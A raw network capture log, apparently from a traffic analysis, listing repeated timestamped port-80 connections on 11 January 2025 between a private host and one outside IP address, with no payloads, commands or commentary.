                                                                                  Jan 11, 2025 06:43:16.713952065 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.714138985 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.718978882 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.719105005 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.822776079 CET805691537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.863920927 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.951612949 CET805691537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:17.007628918 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.269032001 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:17.316967010 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.690783978 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.695719004 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:17.695805073 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.696822882 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.701761007 CET805691537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:17.701833963 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.732598066 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.738240957 CET805692137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:17.738332033 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.738461971 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:17.744776964 CET805692137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:18.082683086 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:18.089082003 CET805692137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:18.089097023 CET805692137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:18.089107037 CET805692137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:18.371696949 CET805692137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:18.426389933 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:18.502990007 CET805692137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:18.551400900 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:18.771347046 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:18.776191950 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:18.776269913 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:18.776649952 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:18.781385899 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.218698978 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.223599911 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.223617077 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.223628998 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.413922071 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.520075083 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.584779024 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.629457951 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.885005951 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.886218071 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.891045094 CET805692637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.891112089 CET5692680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.892214060 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:19.892296076 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.892827988 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:19.898822069 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.242187977 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:20.250252008 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.250268936 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.250277996 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.520787001 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.570560932 CET5692180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:20.571635962 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:20.650435925 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:20.700635910 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.102345943 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.107323885 CET805693437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.107372046 CET5693480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.199193001 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.204046011 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.204123020 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.204328060 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.209137917 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.551412106 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:21.557477951 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.557518959 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.557549000 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:21.848150015 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.020170927 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.021879911 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.129446030 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.209765911 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.210462093 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.215286016 CET805694137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.215383053 CET5694180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.215794086 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.215868950 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.215986967 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.222553015 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.349539995 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.354450941 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.354532957 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.354626894 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.359523058 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.567076921 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.571837902 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.571964025 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.571976900 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.707684040 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:22.712555885 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.712722063 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.848571062 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.983200073 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:22.983805895 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.007421017 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.139133930 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.141657114 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.375610113 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.377427101 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.380669117 CET805694837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.380743027 CET5694880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:23.382401943 CET805694737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:23.382477999 CET5694780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.124082088 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.128954887 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.129137993 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.129266977 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.134125948 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.473403931 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:24.478338957 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.478353024 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.478363991 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.797979116 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.930340052 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:24.934185982 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.431988955 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.434700012 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.437024117 CET805695437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.437082052 CET5695480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.439488888 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.439563990 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.440104008 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.444902897 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.785851955 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:25.792166948 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.792207003 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:25.792234898 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:26.066072941 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:26.129472971 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:26.193763971 CET805696137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:26.332644939 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.163856983 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.168793917 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.168864965 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.169143915 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.173955917 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.525475979 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.530287027 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.530426025 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.891774893 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.906416893 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.911608934 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.911777973 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.911962032 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.916809082 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.039328098 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.039654970 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.040024996 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.045115948 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.045335054 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.270168066 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.277925968 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.277942896 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.277951956 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.602412939 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.732094049 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.732162952 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.076097012 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.141444921 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.142393112 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.146456003 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.146507978 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.147145033 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.147222042 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.147370100 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.152199030 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.645123959 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.650054932 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.650075912 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.650087118 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.775299072 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.903352022 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.903529882 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.189981937 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.190793037 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.194911957 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.194962978 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.195601940 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.195668936 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.195831060 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.200572014 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.565469027 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.570405960 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.570440054 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.570450068 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.843065023 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.974092007 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.974174976 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.225260973 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.230216026 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.230304956 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.230444908 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.235275984 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.582953930 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.583153963 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.587810040 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.587850094 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.587861061 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.890387058 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.023919106 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.023993015 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.182467937 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.186134100 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.187482119 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.187541962 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.191010952 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.191082954 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.191212893 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.196046114 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.535810947 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.540707111 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.540723085 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.540787935 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.820041895 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.985991955 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.986052990 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.052506924 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.053000927 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.057531118 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.057605028 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.057873964 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.057952881 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.058068991 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.063487053 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.206667900 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.209285021 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.214112997 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.214241982 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.214401007 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.219350100 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.251605034 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.508821964 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.508909941 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.570993900 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.575869083 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.575875044 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.576047897 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.861743927 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.961797953 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.998178959 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.129419088 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:35.130536079 CET5701380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:35.134562969 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.134711027 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:35.135417938 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.135503054 CET5701380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:35.135605097 CET5701380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:35.140372038 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.488943100 CET5701380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:35.493828058 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.493844032 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.493854046 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.764413118 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.894414902 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:35.894485950 CET5701380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:36.263880968 CET5701380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:36.265530109 CET5701980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:36.268918037 CET805701337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:36.270374060 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:36.270500898 CET5701380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:36.270503998 CET5701980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:36.271702051 CET5701980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:36.276551962 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:36.629897118 CET5701980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:36.634856939 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:36.634886980 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:36.634897947 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:36.917495012 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:37.050012112 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:37.050110102 CET5701980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:37.405257940 CET5701980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:37.406204939 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:37.410290003 CET805701937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:37.410351992 CET5701980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:37.411067009 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:37.411144018 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:37.414597988 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:37.419472933 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:37.770519018 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:37.775438070 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:37.775454044 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:37.775464058 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.040425062 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.129511118 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.170429945 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.332631111 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.341547966 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.342838049 CET5703680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.346574068 CET805702637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.346637011 CET5702680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.347714901 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.347819090 CET5703680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.348045111 CET5703680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.352803946 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.692085028 CET5703680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:38.697191000 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.697216034 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.697227001 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:38.976774931 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.027358055 CET5703680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.106523037 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.225418091 CET5704280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.225493908 CET5703680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.230293989 CET805704237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.230544090 CET5704280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.230544090 CET5704280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.230576038 CET805703637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.231641054 CET5703680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.235423088 CET805704237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.261663914 CET5704280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.263106108 CET5704380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.268095016 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.268177032 CET5704380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.268450975 CET5704380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.273228884 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.307529926 CET805704237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.613997936 CET5704380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.619735956 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.619752884 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.619761944 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.700105906 CET805704237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:39.700593948 CET5704280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:39.896876097 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:40.029237032 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:40.033596039 CET5704380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:40.556164980 CET5704380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:40.557404041 CET5705080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:40.561294079 CET805704337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:40.561358929 CET5704380192.168.2.637.44.238.250
